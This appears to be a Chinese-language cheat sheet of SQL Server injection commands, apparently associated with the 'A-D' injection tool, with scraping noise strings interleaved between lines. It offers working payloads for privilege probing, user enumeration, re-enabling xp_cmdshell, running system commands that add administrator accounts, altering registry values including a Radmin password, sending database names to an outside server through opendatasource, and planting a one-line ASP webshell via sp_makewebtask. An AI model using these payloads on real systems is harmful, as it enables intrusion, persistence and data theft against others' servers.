阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
//看看是什么权限的
* ]+ A' k+ y  O1 B4 u: Iand 1=(Select IS_MEMBER('db_owner'))
3 T9 z# q, E- P5 J: P5 ^And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

& i' W9 X4 c$ g5 C//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
+ }5 e" ]/ `9 D. Z0 g# A
0 z+ Y" b* n6 e2 l
; H4 ~' B) h. h( F. V; Y数字类型
and char(124)%2Buser%2Bchar(124)=0
% @4 {( L/ I5 F; V, O
( L0 x" J6 d5 A( k; l  g  P6 l字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
8 F9 ?% f, Y, l) p) r6 p; a0 T- I
搜索类型
9 x& T7 y" R& X7 p2 u' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
and user>0
3 t+ N6 s$ K0 ~5 |0 A3 [9 q1 x  `' and user>0 and ''='

  k& ]* A4 N. u! O检测是否为SA权限
3 Q! E* T8 p) c4 uand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
- r4 c' O8 Y6 ^0 Q. h7 }( b, K9 [And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
' S# w. j, _. E1 Q
检测是不是MSSQL数据库
and exists (select * from sysobjects);--

检测是否支持多行
* H+ W# o& l% m/ P;declare @d int;--

; U' q9 Q, L: o! x恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
+ N- d9 q0 x# {2 {( d1 B

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

6 [. @. g1 M  ^- c6 e: n//-----------------------
//      执行命令
//-----------------------
首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
7 ~3 O" ?: z  O3 }9 A
然后利用jet.oledb执行系统命令
4 T; Z: E; h& g: \7 ?8 s) _select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

# x/ a) c* K1 p. m  z执行命令
9 x$ H! c  L- K! M;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
2 [/ D# g7 h+ v' z# l# A' I* G1 u
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
% T7 a3 f5 h" x4 q8 q9 H" f! ]
0 m" W) E7 p7 P' B" l2 {- h8 O判断xp_cmdshell扩展存储过程是否存在：
; L8 j* C* F$ G& B0 G5 c1 l. Ghttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
/ u1 B8 \2 u" v( d
5 \  q; y" M7 E' m' K2 i: j& T% p写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
! k6 ?, X. _6 [- F5 I& M$ [
/ X' C& g! Z* `+ fREG_SZ
4 Z' E1 h4 j6 }, f# G
读注册表
4 Y+ O" F6 @% ?& `- w( Hexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
( E, ^2 Y# A" Y
- S; ?) b3 M7 ~0 A: j  p4 i读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1


/ f3 g2 k7 D- t, F6 o  ~数据库备份
6 R% N) I3 J# X. Ebackup database pubs to disk = 'c:\123.bak'
0 Q" @+ P' _5 I2 X% v
//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--


! T% ?4 u3 [) [/ G. D# F# I
更改sa口令方法：用sql综合利用工具连接后，执行命令：
3 K( _8 |( J0 `. p. R) H' p$ Qexec sp_password NULL,'新密码','sa'
3 t. [; K# i7 L' K# g# E/ e1 H. |- o
添加和删除一个SA权限的用户test：
* N# Z, c- L2 D  v9 X: D1 gexec master.dbo.sp_addlogin test,ptlove
6 {0 Q; K5 b  fexec master.dbo.sp_addsrvrolemember test,sysadmin

% f- B3 W2 r% ]% v7 w删除扩展存储过过程xp_cmdshell的语句:
% A. O. T0 f  Q; ]exec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
3 O1 ^" z) P+ Y# {% V4 ?* ?GRANT exec On xp_proxiedadata TO public
) @6 [9 A  m8 S! t+ A* g: n
. }" Z2 w3 k& u* c! j* w
! v" P" n& t2 b) f( V$ I停掉或激活某个服务。
* c6 ~1 R, e0 i( t
$ A  c( m# ~) Oexec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs
4 F& p; @4 }6 e+ h6 K% Q
只列某个目录下的子目录。
) @/ O( q5 o4 w8 Q$ [xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
2 [8 t/ u0 `$ e) S4 c9 B$ {
( L; p2 g0 A5 @dbo.xp_makecab
$ k; s3 E; e) {
; |! l) w/ B: v5 _将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
'c:\test.cab','mszip',1,
" k: y) d5 U3 X% f) k) r'C:\Inetpub\wwwroot\SQLInject\login.asp',
+ n% G! P; v# C' [8 j, |'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
# e# x- V$ z+ M* H! r7 c
xp_terminate_process
( d  @6 G3 t3 K5 d' i6 P: l$ W
5 ?. I" Y( @) R; P" c0 U停掉某个执行中的程序，但赋予的参数是 Process ID。
. Q. L+ X4 l; D! i* t5 g利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
% e! A$ K) D: q* V% {
xp_terminate_process 2484
( |, `+ r1 I. |: `7 \8 d
0 B2 x7 D9 T" p5 n( D" |/ gxp_unpackcab
: k8 u, I# b. D/ \, O. [" D5 O
) p4 W  Q" L. N3 U- m, U/ h解开压缩档。

xp_unpackcab 'c:\test.cab','c:\temp',1
6 [+ A9 o9 b6 y# u) q0 |
9 @+ i2 [: I1 H( E; Z5 t: h' q* |
3 r! A1 I, Z& H/ ?某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
; M- q2 [& u9 B
create database lcx;
, d; k  T6 e$ c8 F* [Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases


) f6 p6 |7 }0 o5 N- d# g4 ~//在Master中创建表，看看权限怎样
; `) C6 R0 T. y% u! j( hCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
* |+ Z5 M# V" X
//更新表内容
+ S+ p' Z' f3 Q4 [7 LUpdate films SET kind = 'Dramatic' Where id = 123

//删除内容
# y9 r8 m9 G6 J; j; g0 z1 \8 P: {3 [% zdelete from table_name where Stockid = 3